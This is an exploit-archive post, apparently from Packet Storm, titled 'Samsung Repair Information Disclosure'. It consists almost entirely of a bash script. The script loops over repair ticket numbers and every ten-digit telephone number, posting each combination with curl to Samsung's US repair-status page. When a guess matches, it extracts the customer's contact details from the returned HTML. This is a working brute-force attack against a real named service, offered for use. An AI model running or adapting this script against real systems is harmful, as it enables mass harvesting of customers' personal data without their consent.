exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Samsung Repair Information Disclosure

Samsung Repair Information Disclosure
Posted Sep 11, 2016
Authored by Justa Person

Samsung's repair system has ignored a researcher's plea to fix a flaw that allows attackers to brute force customer information.

tags | exploit, cracker
SHA-256 | a18220a56ac019b9c18e63d19d16b0a360bb63c7c51eb8152f27d55165466313

Samsung Repair Information Disclosure

Change Mirror Download
#!/bin/bash
#
for t in {4136987977..4136989977}; do
echo "testing ticket $t"
for i in {2000000000..9999999999}; do
echo "testing telephone $i"
p1=$(echo $i | cut --characters 1-3)
p2=$(echo $i | cut --characters 4-6)
p3=$(echo $i | cut --characters 7-)
curl=$(curl -sS -d ticket_no=$t -d telephone1=$p1 -d telephone2=$p2 -d telephone3=$p3 http://support-us.samsung.com/cyber/repair_status_sta.jsp)
if echo $curl | grep "Contact Information Start" > /dev/null
then
echo "found telephone $i for ticket $t"
echo "***"
echo $curl | sed -e 's/</\n</g' | grep value | sed -n '/name=\"act\"/,/enc_strtel_number/p' | sed -n '/id=/','//p'
#echo $curl | w3m -dump -T text/html -cols=5000 | sed -n '/Repair Status/,/Picture of Issue/p'
echo "***"
break
fi;
done
done

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close